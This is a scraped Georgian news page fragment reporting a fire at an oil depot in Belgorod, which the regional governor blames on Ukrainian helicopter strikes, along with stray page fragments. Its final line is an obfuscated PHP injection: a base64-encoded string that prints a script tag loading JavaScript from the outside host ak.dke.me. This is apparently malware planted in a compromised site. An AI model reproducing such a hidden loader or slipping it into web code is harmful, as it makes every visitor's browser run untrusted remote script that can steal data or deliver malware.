celsiusi
ავერსი შნაიდერი
გუბერნატორი რუსეთის ქალაქ ბელგოროდის დაბომბვაში უკრაინას ადანაშაულებს- ხანძარი ბელგოროდში მდებარე ნავთობბაზაზე გვიან ღამით გაჩნდა. იწვის ნავთობის 8 საცავი, მიმდებარე ქუჩების მოსახლეობა კი დროებით გაიყვანეს საცხოვრებელი სახლებიდან.
 
ოლქის გუბერნატორი ვიაჩესლავ გლად-კოვი ამბობს, რომ ნავთობბაზა ორმა უკრაინულმა ვერტმფრენმა დაბომბა. თავად უკრაინას ჯერჯერობით აღნიშნული ინფორმაცია არ დაუდასტურებია. ბელგოროდი რუსეთ-უკრაინის საზღვრიდან 30 კილომეტრში მდებარეობს და ის არის უახლოესი რუსული ქალაქი უკრაინის ქალაქ ხარკოვიდან. რუსეთის ხელისუფლების ინფორმაციით, ნავთობბაზაზე მსუბუქად დაშავდა ორი ადამიანი, მსხვერპლი არ ყოფილა, ადგილზე მუშაობენ მეხანძრეები.
812
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");